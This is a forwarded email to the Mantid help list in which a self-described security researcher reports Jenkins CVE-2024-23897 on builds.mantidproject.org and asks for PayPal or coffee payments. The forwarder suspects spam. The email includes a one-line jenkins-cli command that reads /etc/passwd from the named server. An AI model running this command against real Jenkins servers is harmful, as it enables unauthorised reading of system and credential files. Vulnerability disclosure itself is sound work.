Forwarding onto Mantid DevOps. Could be spam but best to double check.

 

From: דוד בוזגלו via Mantid-help <mantid-help@mantidproject.org>
Sent: 27 January 2024 14:28
To: Mantid Help <mantid-help@mantidproject.org>
Subject: [Mantid-help] CVE-2024-23897 - builds.mantidproject.org- Jenkins Arbitrary file read vulnerability‏‏‏‏

 

Hello,

My name is David and I am a security researcher.

Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE 

 

Url :https://builds.mantidproject.org

 

java -jar ./jenkins-cli.jar -s https://builds.mantidproject.org/ connect-node "@/etc/passwd"

image.png

 

 

 read more : 

https://securityonline.info/cve-2024-23897-cvss-9-8-critical-jenkins-security-vulnerability-rce-possible/ 

https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html https://github.com/jenkinsci/jenkins/commit/554f03782057c499c49bbb06575f0d28b5200edb

 

Liked my Bug ? Buy me a coffee (or more likely a Beer X2)

https://www.paypal.com/paypalme/bugbounty1/150USD

https://www.paypal.com/paypalme/bugbounty1/75USD 

https://www.buymeacoffee.com/bugbounty

 

Help me to continue to protect others Information .